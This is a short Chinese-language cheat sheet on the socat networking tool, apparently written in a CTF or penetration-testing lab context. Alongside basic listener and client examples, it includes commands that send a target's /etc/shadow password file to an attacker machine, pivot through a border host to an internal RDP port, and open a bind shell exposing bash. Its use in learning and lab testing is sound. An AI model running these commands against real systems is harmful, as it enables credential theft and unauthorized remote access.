姊妹篇:[NetCat]姿势笔记
Socat 是 Linux 下的一个多功能的网络工具,名字来由是 「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。
Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE、EXEC、System、Open、Proxy、Openssl、Socket等。
⚪创建一个服务端
socat TCP-LISTEN:7894 –
⚪创建一个客户端(连接服务端)
socat – TCP:192.168.58.134:7894
⚪读取文件
socat – /var/www/html/flag.php
⚪写入文件
echo “hello world!” | socat – ‘/root/桌面/CTF/test’
⚪文件传输
将目标机中的/etc/shadow传输给攻击机,并重命名为mima.txt。
(在哪里执行create的,文件就在哪里)
socat -u /etc/shadow TCP4-LISTEN:55,reuseaddr
socat -u TCP4:192.168.58.134:55 OPEN:mima.txt,create
⚪正向端口转发
通过边界主机去访问内网的主机。
边界主机(kali):192.168.58.134
内网主机(win10):192.168.58.129
在边界主机执行命令,将来自外部1000的流量全部都转发到内网机器的3389端口上。
socat TCP4-LISTEN:1000,fork TCP4:192.168.58.129:3389
在本地(模拟外部主机)连接3389,ip填写边界主机的:
成功连接到内网的Win10:
⚪执行bash
目标机:
socat tcp-l:8888 system:bash,pty,stderr
本地(攻击机):
socat – tcp:192.168.58.140:8888